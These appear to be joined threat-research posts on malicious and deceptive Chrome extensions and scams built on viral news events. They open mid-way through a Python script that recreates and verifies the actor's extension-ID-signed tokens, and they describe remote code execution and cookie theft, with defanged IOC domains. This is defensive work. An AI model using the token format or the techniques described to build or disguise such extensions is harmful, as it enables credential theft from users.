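    now = int(time.time() if now is None else now)
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"uuid": str(uuid.uuid4()), "ext": extension_id, "ver": version,
               "cc": country, "iat": now, "exp": now + 3600}
    signing_input = ".".join(_b64url(json.dumps(part, separators=(",", ":")).encode())
                             for part in (header, payload))
    sig = hmac.new(extension_id.encode("utf-8"), signing_input.encode(), hashlib.sha256).digest()
    return base64.b64encode(f"{signing_input}.{_b64url(sig)}".encode()).decode()


def check_extension_id_signed(outer_b64, extension_id):
    """Defender check: does this captured token verify under HMAC-SHA256 with the extension ID
    as the key? Returns a dict with a match flag, a reason and, on match, the decoded claims."""
    try:
        jwt = base64.b64decode(outer_b64, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return {"match": False, "reason": "outer layer is not Base64 text"}
    parts = jwt.split(".")
    if len(parts) != 3:
        return {"match": False, "reason": "not a three-part JWT"}
    head, body, sig = parts
    try:
        header = json.loads(_unb64url(head))
        given = _unb64url(sig)
    except (ValueError, UnicodeDecodeError):
        return {"match": False, "reason": "malformed JWT segments"}
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return {"match": False, "reason": "unexpected JWT header"}
    expected = hmac.new(extension_id.encode("utf-8"), f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(given, expected):
        return {"match": False, "reason": "signature does not verify with extension ID as key"}
    return {"match": True, "reason": "HMAC-SHA256 verifies with extension ID as key",
            "claims": json.loads(_unb64url(body))}


def find_signing_extension(outer_b64, installed_ids):
    """Sweep the IDs of installed extensions (e.g. from a Chrome profile) and return the one whose
    ID signs the captured token, or None if none does."""
    for ext_id in installed_ids:
        if check_extension_id_signed(outer_b64, ext_id)["match"]:
            return ext_id
    return None


if __name__ == "__main__":
    # Extension ID quoted in the post; the token is constructed here, not captured from traffic.
    sample_id = "pocfdebmmcmfanifcfeeiafokecfkikj"
    token = build_actor_style_token(sample_id, "1.0.3", "US", now=1_700_000_000)
    print(check_extension_id_signed(token, sample_id))
    print(find_signing_extension(token, ["a" * 32, sample_id]))
```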
The domain registration details of the API endpoints were found to be nearly identical to those of the malicious lure websites with the additional commonalities in website title and content.
- Website Title: SiteName
- Website Content:

A pivot on these domain registration patterns identified the domains provided at the end of this post, suspected to be owned by the actor and used by malicious extensions. Analysis of several extensions identified hardcoded domains that were all found to be in the list of identified API domains, further validating the findings.
Fake Websites and Malicious Chrome Extensions
Since at least February 2024, this malicious actor has deployed over 100 fake websites and malicious Chrome extensions with dual functionalities. Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises.
Notably, the Chrome Web Store has removed several of the actor’s malicious extensions after malware identification. However, the actor’s persistence and the time lag between detection and removal pose a threat to users seeking productivity tools and browser enhancements. Malware distributors such as this often exploit current trends, such as the recent DeepSeek AI media attention, to lure users into installing infected extensions, potentially gaining control over their browsing activity and sensitive data.
All users should protect themselves by exercising caution when installing extensions. Stick to the Chrome Web Store and verified developers, carefully review requested permissions, read reviews, and be wary of lookalike extensions. Keep your browser and antivirus software updated, and regularly review your installed extensions, removing any you don’t need or find suspicious. Vigilance is key to avoiding these threats.
IOCs on GitHub
https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensions
If the community has any additional input, please let us know.
Sign Up For DomainTools Investigations’ Newsletter for the Latest Research
Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

In the fast-paced digital landscape, viral media events capture global attention. From natural disasters and geopolitical shifts to groundbreaking tech releases and cultural phenomena, these moments dominate headlines and online conversations. But as the world's eyes turn towards these events, a different group also takes notice: malicious actors looking to capitalize on the public's interest and urgency.
Our security research team recently undertook a project to identify and analyze scam and malicious domains and websites that emerge in the wake of high-profile viral media events. Leveraging AI-driven research capabilities, we aimed to understand how threat actors exploit these moments for financial gain and other nefarious purposes.
AI-Powered Approach to Identify Viral Media Events
Our research methodology involved using AI to first identify viral media events that occurred between January 1, 2025, and the present. The AI research capability was prompted to pinpoint the approximate start, peak, and end of each event's virality across mass media and wide coverage.
For each identified event, we then tasked the AI with generating a list of keywords likely to appear in domain names or website titles seeking to associate with the event. The prompt for keyword generation was specifically designed to identify terms that scammers might use to create deceptive sites.
We sampled multiple event topics from the AI's output for deeper analysis, including the Los Angeles Fire, "NoKings," DeepSeek / China AI developments, the ongoing Trade War, and the Ukraine/Russia conflict.
An example of the AI's output for a significant tech event is as follows:

By searching for these keywords or similar terms in domain registrations and website titles within the estimated first and last observed timeframes, we detected several domains that appeared to be malicious. It was anticipated that most scam-related or malicious domains would emerge around the peak of viral activity and potentially persist until the latest observed dates.
A sampling of the malicious findings from the AI-generated keywords for the “Deepseek AI Release & Market Impact” event are shown below.
Multiple scams were identified. Perhaps the most financially successful ones relating to the DeepSeek event were fake cryptocurrency meme coins created to capitalize on a growing trend of novice investors looking for the next hyped-up moonshot meme coin. In the case of DeepSeek, according to BeInCrypto (cited in the table above), fake meme coins accrued over $46 million worth before the rug was pulled, presumably indicating the scammers had cashed out.
Additionally, multiple malware delivery websites were observed, primarily delivering Windows trojans and malicious browser extensions. One extension in particular was observed with the capability to legitimately use the DeepSeek API for working functionality, while also connecting to a remote domain to retrieve and execute arbitrary JavaScript files, likely for the purpose of credential harvesting or session hijacking.
Expected vs. Actual Findings Regarding Viral Events
Based on the nature of viral events, we anticipated finding websites and domains attempting to:
- Amplify or create spin-off movements to gain attention.
- Sell merchandise related to the event.
- Collect user information (contact details, experiences, etc.) for spam, resale, or phishing.
- Push deceptive or derisive narratives to further enthral individuals in alleged movements, leading to potential merchandise sales, information gathering, or fraudulent donations.
- Act as "ambulance chasers," with alleged law firms soliciting victims of tragedies for potential profit.
- Deliver malware, adware, or spyware through deceptive downloads.
While we did observe instances of these expected tactics, our research consistently revealed a predominant motivation across the sampled events: direct financial profit.
For almost all events sampled, we identified websites explicitly seeking to profit by:
- Claiming to be part of a legitimate donation foundation supporting the cause (e.g., for the LA Fire, the Ukraine/Russia conflict, and other tragedies like the Myanmar earthquakes).
- Selling merchandise related to the event topic.
- Creating and promoting meme cryptocurrency coins based on the event.
Beyond direct financial scams, we also confirmed the presence of websites designed for:
- Malware delivery.
- Information collection schemes.
- Disinformation campaigns aimed at pushing deceptive and derisive narratives.
Emerging Patterns and Linked Actors Across Viral Events
A significant observation was the emergence of common elements across multiple relatively unique-looking websites covering different viral events. This suggests the likelihood of the same actor or group being behind these diverse scams.
One example was websites that appeared to create meme cryptocurrency coins in response to several highly publicized events in the recent US political landscape and natural disasters, including US tariffs, the trade war, and the LA fire. Several of these seemingly distinct scam sites shared design, language, or infrastructure elements, which points towards a connected operation.
One suspected cluster focused on scam meme coins commonly used IP ISP: Vercel Inc, Registrar: Namecheap, and SSL Issuer CN: R10 or R11, and commonly had website titles consisting of a meme coin name in all caps such as LAFIRE, $LAFIRE, GROK and TOOT. Pivots from this pattern identified several other suspected scam meme coin websites including $TittsFart, $TUCHI, $TOOT, $GWOK, and $SUNG, the last a meme of Sung Jinwoo, the main character of the popular anime series Solo Leveling.
The most prevalent scams observed were those pushing newly created cryptocurrency meme coins, which attracted novice traders seeking to ride the hype of the viral event to make easy money. Once the meme coin reached a certain threshold of time or sale price, the scammers cashed out by selling all of their coins, and the meme coin subsequently collapsed. These meme coin scams were observed across a wide range of events, including international conflicts such as the Russian attacks on Ukraine, the US Trade War, the LA Fire, and the Myanmar Earthquake.
The following are example findings of similar websites, each associated with inactive social media accounts that claim to sell cryptocurrency coins linked to widely publicized media events.
tradewar[.]space, tradewar[.]lol, tradewar[.]site attempt to persuade others to purchase Trade War themed cryptocurrency coins.
lafirebrigade.co[.]uk and lafireonsol[.]xyz attempt to persuade others to purchase a LA Fire-themed cryptocurrency coin.
![lafirebrigade.co[.]uk, lafireonsol[.]xyz attempt to persuade others to purchase a LA Fire themed cryptocurrency coin](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263adcee67731ab0f4b98_AD_4nXcW1mcqkE3HlkIVrjj_H5Ld5Ta0zChrygeWpSwauXAt3reS5WxgVSOHbLQN5HusW4Verqd8Fh-keX9vuoM_5TGWDPgF_FDCtKvu70h36AwocpeU-jOgWwuyyNvgZlKUue8AJ4iJ8A.png)
lafire[.]io is another website attempting to pass off the scam crypto coin LAFIRE as a donation fund.
![lafire[.]io is another website attempting to pawn off scam crypto coin LAFIRE as a donation fund tactic.](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263adcee67731ab0f4b95_AD_4nXeTPwO0WvgKdnPjmL3T0e9TVMWo_uSJ_zTkRIAvt96XjOJlNAdLjpxCSaCaIoXhKQ6yYUrkxz1sshbhPWrN4KK3iJqIz2kK6NaRPD281mRG4HlrHxZZp6P1EB45aTC9BI4Pk3xy2Q.png)
Myanmar Meme coin myanmarmeme[.]top
![Myanmar Meme coin myanmarmeme[.]top](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263adcee67731ab0f4b88_AD_4nXdL0VvE3fe3lV1aqfTBVWCX0npkinxZaM93ilorsB2LZgzAo9ToEYLw6P4-sFmQJkevRYtiA_x3v-FGskdxMHw-YseSqB8e2GWJYDtf7xFKv-drkwDSxGSdZsfsGDoX0T8b9NsvnA.png)
tootonsol[.]xyz
![tootonsol[.]xyz](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263adcee67731ab0f4b7c_AD_4nXfaLyaUv6_eQKUtLyaEfbqgZ31ZwiftmI0Y8pNCwbytzn5fWk0CrPIEIyU1_fMvX4htgvM1-Jz6yHWy_bm-rBbFNXdj2D5kPxCCh2p-CRWgJI1yt9XSbXQJArtnnfrVQ3COCJm88A.png)
gork[.]ink suspected scam meme coin attempted to capitalize on the recent news hype of the Elon Musk-owned xAI Grok AI model. Decrypt reported the alleged scam meme coin achieved $160 million in market capitalization before crashing.
![gork[.]ink suspected scam meme coin attempted to capitalize on the recent news hype of Elon Musk owned xAI Grok AI model](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263adcee67731ab0f4b8e_AD_4nXd8obIUxOaX5UXJx98HBhqo6FA3Sju-qaL6zle5_MnOTf0J1Tw9q4VhBCvTFbDEZUDdI3dN7GUU2-nl0W-AgqafyIw14_OBYIlNNKL-9avwkX0RU3MwV0IXXVJNyPmeX5xALlYXKg.png)
The second most prevalent scam tactic observed involved fake donations, sometimes masquerading as established entities such as the American Red Cross, World Food Program or LA Fire departments.
Specifically relating to the LA fire event, BforeAI published a report highlighting a similar method of identifying these types of scam domains in which a variety of websites were identified. Their report also noted multiple consistencies in the types of domains and websites being created in the aftermath of natural disasters.
lafirevictimsupport[.]com and lafireonsol[.]xyz purported to collect donations on behalf of the American Red Cross.
![lafirevictimsupport[.]com, lafireonsol[.]xyz purported to collect donations on behalf of the American Red Cross](https://cdn.prod.website-files.com/6941445776ba1afe6af83186/695263adcee67731ab0f4b82_AD_4nXdVvQbUD_x8SGl5a5vyY4-73xb1Ul1wuwQKfc33rDMHab3VS0DYP7HyC9aq2hZWHRA7jJPLIVuFVdBaubzIAbHbJVe-tZ78gi_tPJf0ma_5v8ogBQUXrlhRDg1JzC6yb4JZWZnBMg.png)
donorsee-charitable[.]com is a cryptocurrency donation scheme for Myanmar earthquake victims purporting to be part of the World Food Program (WFPUSA).

Malicious Actors Leveraging Viral Media Events for Financial Gain
Our research highlights the clear and present danger posed by malicious actors who quickly leverage viral media events for their own gain. The speed at which these events unfold provides a fertile ground for scammers to deploy a variety of schemes primarily focused on financial exploitation through fake donations, merchandise sales, and cryptocurrency scams. The observed connections between scam sites operating across different viral topics underscore the adaptive and potentially organized nature of these threat actors.
Staying vigilant and critically evaluating any website or domain seeking engagement related to a viral event is crucial. Always verify the legitimacy of organizations, especially those requesting donations or personal information, and be wary of unsolicited offers or urgent calls to action tied to breaking news. As security researchers, we will continue to monitor this evolving threat landscape and share our findings to help the public stay safe online.

Like any garden, the digital landscape experiences the emergence of unexpected blooms. Among the helpful flora of browser and application extensions, some appear with intentions less than pure. These deceptive ones, often born from a fleeting desire for illicit gain or mischievous disruption, may possess a certain transient beauty in their ingenuity. They arrive, sometimes subtly flawed in their execution, yet are driven by an aspiration to infiltrate our digital lives, to harvest our data, or to simply sow chaos.
We see them not in complete, monolithic forms, but in their evolving iterations. A small crack in their initial design might be patched in the next update, a vulnerability exploited and then hastily concealed. Their existence is a dance of adaptation, a response to the ever-watchful gaze of security systems. They are, in a sense, perfectly imperfect – their flaws often intertwined with the very mechanisms that allow them to function, however briefly.
On the other side of this digital ecosystem reside the forces of security and risk awareness. These are the gardeners, constantly tending to the health of the digital space, pruning away the harmful growths. Security measures, with their own imperfections and constant striving for improvement, represent the human desire for safety and control. Risk, then, is the shadow cast by these deceptive extensions, a reminder of the potential cost of their transient existence – the loss of privacy, the compromise of personal information, the erosion of trust in the digital tools we rely upon.
The human experience at the heart of this is one of vulnerability and resilience. We, the users, navigate this landscape, often unaware of the subtle battles being waged. We place our trust in the extensions we install, hoping for enhanced functionality or convenience. When that trust is betrayed by a deceptive app or extension, it leaves a mark, a subtle crack in our digital confidence.
This story is a reminder that the digital world, like the natural one, is in constant flux, and our experience within it is shaped by this delicate and ever-shifting balance between aspiration and risk, between the fleeting beauty of innovation and the enduring need for security.
Browser Extensions’ Security Risk
Browser extensions can pose a security risk to individuals and organizations. Data from the user’s browser or inputs to the extensions can be sent to third parties who may not practice effective security measures to protect user data and privacy. This report highlights a network of approximately 20 newly registered websites intended to lure people into installing new browser extensions from the Chrome Web Store. The domains and extensions were likely created by a single author and exhibit patterns of deceptive practices and potential security risks. While the extensions do not display overtly malicious behavior, their design choices raise concerns regarding user privacy and data security.
The Network and Its Characteristics:
The extensions, available on the Google Chrome Web Store, share several common traits:
- Manipulated Ratings: All extensions employ a deceptive rating system, funneling positive reviews to the Chrome Web Store while discarding negative feedback.
- External Data Transmission: Some extensions, particularly those offering AI-powered features, transmit user data to domains owned by the author. This includes chat history, input data, and potentially sensitive information.
- Misleading Branding: Certain extensions use misleading branding, falsely associating themselves with well-known services (e.g., "DeepSeek AI").
- Functional Diversity: The extensions offer a range of functionalities, including AI writing and ad creation tools, URL shortening, PDF to JPG conversion, and AI chatbots.
Security Researcher's Guide: Investigating Suspicious Browser Extensions:
Investigative Steps:
- Initial Observation:
  - Note the extension's stated functionality and its perceived utility.
  - Examine user reviews for consistency and authenticity. Be wary of overwhelmingly positive reviews with limited negative feedback.
  - Record the developer's name and any associated websites or domains.
- Extension Retrieval:
  - Obtain the Extension ID: Locate the extension on the Chrome Web Store or via a URL from a website directing users to download the extension.
  - Download the Extension: Use a tool like chrome-stats[.]com to download the extension's .crx file.
  - Unpack the Extension: One method is to use a file archiving tool (e.g., 7-Zip) to extract the contents of the .crx file.
- Analyze the Files:
  - Examine the manifest.json file for permission requests and service worker details. Pay attention to permissions that seem excessive for the extension's stated functionality.
  - Analyze JavaScript files for suspicious code, external API calls, and data transmission patterns. Look for obfuscated or unusual code that may warrant further investigation.
  - Review the Domains: Research the domains that the extension uses, and be suspicious of generic or unknown domains. Assess the domain's registration information, hosting provider, and overall reputation.
- Data Flow Assessment:
  - Identify the types of data being transmitted and the purpose of the transmission. Evaluate the security and privacy implications of the data transmission.
Examples:


An interested user might see a 4.8-star rating and at least 1,000 users, not an insubstantial number given the recent global proliferation of DeepSeek AI related apps in the past few months.
A closer look at the reviews, however, shows only 4 ratings.

The extension's core functionality involves capturing user input and the entire ongoing chat history, then transmitting this data to an external server (ai-chat-bot[.]pro) with every message sent by the user. This presents a significant privacy risk, as potentially sensitive conversation data is processed by an unverified third party.

Common among all the observed extensions by this author is code that includes a rating widget that actively filters user feedback. Users providing low ratings (1-3 stars) are redirected to a private feedback form on the ai-chat-bot[.]pro domain, while users providing high ratings (4-5 stars) are sent to the official Chrome Web Store (CWS) review page. This artificially inflates the extension's public rating and violates CWS policy.

A background script directs users to pages hosted on the same suspicious ai-chat-bot[.]pro domain upon extension installation (welcome page) and sets it as the target URL upon uninstallation. This allows the external server to track install/uninstall events.

The code opens a new tab that loads the following page:

This page then sets multiple Yandex tracking cookies without permissions and retrieves browser information from the user.
Even without overtly malicious intent, the observed review manipulation and external transmission of the user’s IP, browser information and associated chat history raise concerns. This grants the website owner access to sensitive user interactions, a potentially serious issue given the increasing data leakage associated with AI productivity tools. The rapid adoption of AI integrations, facilitated by accessible browser extensions, can lead to a gradual erosion of security practices as users develop a false sense of trust. This "out of sight, out of mind" mentality risks exposing sensitive data, such as code, personal searches, and AI chatbot inputs, to malicious third parties who may engage in eavesdropping, data selling, or exploitation.
Looking For More: Domain Registration Patterns
- IP Resolved: 164.90.199[.]205
- IP ISP: DigitalOcean LLC
- Use Yandex Trackers: 99419511 / 99794673 / 99764413
- Registrar: Porkbun LLC
- SSL Issuer: R10 / R11
- NameServer Domain: messagingengine[.]com
- Server Type: Apache/2.4.52 (Ubuntu)
- MX Domain: messagingengine[.]com
AI Slop
"AI Slop" refers to low-quality, often generic and repetitive content, including text and images, generated by artificial intelligence, indicating a lack of human oversight and effort. In this case, the presence of many uniformly structured websites, each with minimal, repetitive content and duplicated code across their associated browser extensions, may suggest they are the product of AI Slop. The generic stock imagery, boilerplate text, and superficial explanations of extension functionality align with this definition, indicating a potential reliance on automated AI generation rather than thoughtful development.
A Surge in AI Slop
Continuing our exploration of the digital landscape, we now see a new element stirring the garden: a surge of growth we might call "AI Slop." This refers to the rapidly increasing volume of apps and extensions, often born with the assistance of artificial intelligence, that flood the digital stores without the careful cultivation of thoughtful development, particularly around ethical considerations, privacy and security.
This influx amplifies the transient nature of the deceptive Chrome extensions we've discussed. AI tools can accelerate their creation and deployment, leading to a more rapid cycle of appearance, exploitation, and eventual detection. The digital garden becomes overgrown, making it harder to discern the true blooms from the weeds.
Deceptions and user risks over privacy and security we observe in hand-crafted malicious extensions can be magnified in those influenced by AI Slop. While AI can generate code quickly, it might lack the nuanced understanding of security vulnerabilities or the ethical considerations that human developers often bring. This can result in extensions riddled with unintentional flaws that are nonetheless exploitable, or even intentionally deceptive features woven into the code with algorithmic efficiency.
The "aspirations" of these AI-assisted deceptive extensions might be less about ingenious design and more about sheer volume. The ease with which they can be generated lowers the barrier for malicious actors, potentially leading to a flood of mediocre but still harmful extensions aimed at overwhelming users and security systems alike. The digital storefronts become crowded marketplaces where discerning genuine value from deceptive imitation becomes an increasingly difficult task for the average user.
The human experience is significantly impacted by this AI Slop. Users, already faced with a bewildering array of choices, are now confronted with an even greater volume of extensions and apps, many of them indistinguishable from legitimate options at a glance. The ability to pick the "perfect" extension becomes an exercise in futility, as the sheer quantity dilutes the quality and increases the risk of encountering a deceptive one. This overabundance erodes trust not just in individual extensions and apps, but in the platforms themselves.
The forces of security now face an even greater challenge. The volume and rapid evolution of AI-Slop-driven extensions and apps make detection and mitigation a constant uphill battle. Traditional signature-based approaches struggle to keep pace with the algorithmic generation of new threats. The gardeners of the digital space must now adapt to a landscape where weeds can sprout with unprecedented speed and in overwhelming numbers.
IOCs on GitHub
https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DeceptiveBrowserExtensions-AISlop
If the community has any additional input, please let us know.
